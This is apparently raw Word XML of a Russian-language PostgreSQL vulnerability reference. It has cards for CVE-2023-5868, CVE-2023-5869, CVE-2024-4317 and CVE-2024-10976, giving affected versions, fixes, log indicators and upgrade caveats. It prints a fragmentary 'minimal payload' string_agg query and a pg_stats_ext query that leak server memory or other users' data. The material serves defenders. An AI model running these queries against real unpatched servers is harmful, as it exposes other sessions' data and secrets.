          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- 'A' интерпретируется как unknown-type (без явного cast)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT string_agg('A',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Аналогично для других aggregate-функций — точный набор форм</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- см. Red Hat Bugzilla 2247168.</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Возвращаются байты process-памяти процесса postgres, лежавшие за концом буфера до следующего NUL-byte. В выгрузке могут оказаться: фрагменты SQL других одновременных сессий, обрывки данных из page cache (включая pg_authid / pg_shadow, если они недавно читались), куски значений других tenant-ов в multi-tenant deployment. На каждый вызов содержимое разное — это side-channel, не deterministic exfiltration.</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Aggregate code-path для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">unknown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-типа не проверял длину входной строки и читал до первого NUL-byte, что в C-памяти процесса есть undefined behaviour. Фикс в 16.1 добавляет explicit type-resolution до обработки и bounds-check при чтении.</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Аутентифицированный пользователь с правом исполнять SQL. Никаких особых привилегий, никаких расширений. Низкий порог эксплуатации.</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Затронуто (≤): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">16.0, 15.4, 14.9, 13.12, 12.16, 11.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Фикс: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">16.1, 15.5, 14.10, 13.13, 12.17, 11.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (09.11.2023).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит атака в логах.</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подозрительны частые normalized-вызовы вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string_agg(?,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array_agg(?)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от ролей, у которых aggregate-функции не присутствуют в legitimate business-flow. Усиливающий маркер — высокая частота вызовов из одной сессии (scrape памяти серией), идентичный SQL с разным результатом при повторе.</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3.8 (извлечение метаданных) — общий класс information disclosure; CVE-2024-4317 (R17, 3.8.6) — родственный leak через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CVE-2023-5869 (R13, ниже) — соседний CVE того же batch-а, memory corruption class.</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CVE-2023-5868</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, репортер Jingzhou Fu. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Hat Bugzilla 2247168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точный список затрагиваемых функций.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2023-5869 — integer overflow в array → arbitrary code execution (полная карточка)</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При модификации SQL-массивов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">array_append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array_cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, operations на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">anyarray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-типах) отсутствовали проверки на integer overflow в расчёте требуемого размера буфера. Authenticated database user мог сконструировать массив со специально подобранными размерностями и заставить сервер записать произвольные байты в memory area, что приводит к arbitrary code execution. Класс — memory corruption (не классическая SQL-инъекция, но эксплуатируется через SQL).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Минимальный payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Public PoC отсутствует. Цитата advisory verbatim:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- "While modifying certain SQL array values, missing overflow checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--  let authenticated database users write arbitrary bytes to a memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--  area that facilitates arbitrary code execution."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Credit: Pedro Gallegos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC не публикован — advisory открытый, конкретные размерности и форму payload-а Pedro Gallegos не раскрыл; повтор exploit на стенде требует ручного reverse-engineering фикс-commit-а.</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В зависимости от технологии эксплуатации — либо RCE как OS-пользователь, под которым работает postmaster (обычно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на Linux), либо чтение/запись произвольной памяти серверного процесса (что даёт доступ к данным других сессий, кэшам аутентификации, секретам в shared buffer-ах). Severity по advisory — high.</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Integer overflow в подсчёте требуемого размера allocated buffer при array modification. После overflow подсистема выделяет буфер меньше, чем нужно для записываемых данных, и пишет за его границей. Так как массивы — first-class тип в PostgreSQL, поверхность атаки покрывает все role-уровни, имеющие право выполнять SQL. Фикс в 16.1 — overflow-проверки в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/utils/adt/arrayfuncs.c</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Аутентифицированный пользователь. Уровень привилегий — minimal (любая роль с правом исполнять SQL). Никаких расширений или особых конфигов.</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Затронуто (≤): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">16.0, 15.4, 14.9, 13.12, 12.16, 11.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Фикс: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">16.1, 15.5, 14.10, 13.13, 12.17, 11.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (09.11.2023).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Как выглядит атака в логах.</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необычно сложные array-modification вызовы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">array_append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array_cat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array_concat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UPDATE ... SET col = col || ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для array-колонок) от ролей, у которых array-операции не характерны для business-логики. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Strongest indicator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — записи в server log вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">server process (PID N) was terminated by signal 11: Segmentation fault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> сразу после array-операций от такой роли (= неудачная попытка эксплоитa с unstable payload-ом).</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Memory corruption class — не классическая SQL-инъекция, поэтому без якоря в 3.X.N. Концептуально близка к CVE-2025-4207 (R27, GB18030 over-read, 4.5) — оба про bounds-checking failures в C-коде. Соседний CVE того же batch-а — R14 (CVE-2023-5868, memory disclosure).</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CVE-2023-5869</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, репортер Pedro Gallegos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст 2023 года</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2023 — первый полный год после релиза PG 15 (октябрь 2022). Новый statement MERGE сразу принёс CVE-2023-39418 — наглядный пример того, как недавно добавленный feature не успел получить полную аудит-проверку всех взаимодействий (в данном случае — с RLS). Параллельно два memory-class CVE (R13, R14) в ноябрьском batch-е 16.1 напоминают: PostgreSQL safety живёт не только на SQL-уровне, но и в C-коде. PG 16 вышел 14.09.2023; batch 16.1, 15.5, 14.10, 13.13, 12.17, 11.22 (09.11.2023) — финальные минор-фиксы года.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 Хронология 2024</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Самый крупный год по количеству CVE: 14.11.2024 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">четыре CVE одним batch-релизом</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21), плюс R17 (CVE-2024-4317) ранее в году. Большинство имеют якоря в 3.X.N. R10 (CVE-2024-10977, libpq MITM) — полная карточка здесь, потому что класс «trust bypass через MITM» не вошёл в 3.X.N (это не SQL injection — это libpq client-side).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-4317 — утечка через pg_stats_ext</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statistics_name, most_common_vals FROM pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> показывает MCV-данные чужих таблиц без права SELECT на колонку. View-фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">has_column_privilege(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> был реализован частично — для одних колонок, но не для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histogram_bounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. PUBLIC по умолчанию имеет доступ к view → массовый leak фрагментов данных.</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14.11, 15.6, 16.2.</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14.12, 15.7, 16.3 (09.05.2024). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Критичный нюанс:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary upgrade </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не пересоздаёт view</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — после minor upgrade нужно вручную запустить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в каждой БД, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template0</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template1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (иначе новые БД создаются с уязвимым view). Managed-провайдеры в большинстве случаев этот скрипт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не выполняют автоматически</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — см. 4.9.</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3.8.6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2024-10976 — RLS игнорирует user ID change в subquery/CTE</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RLS-фильтр кэшируется в plan-cache под одной ролью и при повторном использовании плана не пересчитывается под другой ролью. Subquery, CTE, security invoker view, SQL-language функция на таблицу с RLS могут применить политику чужой роли при смене user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RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
